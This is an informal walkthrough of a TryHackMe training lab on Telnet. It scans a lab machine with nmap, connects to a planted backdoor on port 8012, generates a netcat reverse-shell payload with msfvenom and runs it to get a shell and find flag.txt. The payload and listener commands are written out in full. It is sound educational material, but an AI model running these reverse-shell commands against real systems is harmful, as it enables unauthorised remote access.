TryHackMe | Cyber Security Training
TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

Telnet is an application protocol which allows the use of a telnet client to connect and execute commands on a remote machine that's hosting a telnet server.

The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.

Telnet sends all messages in clear text and has no specific security mechanisms. Telnet has been replaced by SSH in most production environments.

The user connects to the server by using the Telnet protocol. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the following syntax

telnet [ip] [port]

Analyze that box

sudo nmap -A -O -p- 10.10.147.86

PORT     STATE SERVICE VERSION
8012/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_    SKIDY'S BACKDOOR. Type .HELP to view commands

Why SKIDY, why???!!! Connect to it

telnet 10.10.200.201 8012


Trying 10.10.200.201...
Connected to 10.10.200.201.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
ls -- nothing....
.HELP
.HELP: View commands
.RUN : Execute commands
.EXIT: Exit
.RUN whoami -- nothing....
.RUN ls  -- nothing....
.RUN ping 10.13.12.54 -c 1

That 10.13.12.54 is me on tun0, the IP from the VPN running.....

SWITCH TERMINALS
We’re going to generate a reverse shell payload using msfvenom. We don’t need tcpdump anymore, so kill it. Let’s set the lport environment variable for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.

export lport=4444
msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R

Here is a more generic example to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for you.

msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

-p = payload
lhost = our local host IP address (this is your machine's IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

msfvenom -p cmd/unix/reverse_netcat lhost=10.13.12.54 lport=4444 R

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

nc -lvp 4444

That is setting up netcat to listen

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Cool, now go run that last line printed out back in the skidy's terminal

.RUN mkfifo /tmp/qdfcx; nc 10.13.12.54 4444 0</tmp/qdfcx | /bin/sh >/tmp/qdfcx 2>&1; rm /tmp/qdfcx

Then it poops in the other terminal!!!!!!

nc -lvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
ls
Ncat: Connection from 10.10.200.201.
Ncat: Connection from 10.10.200.201:55650.
flag.txt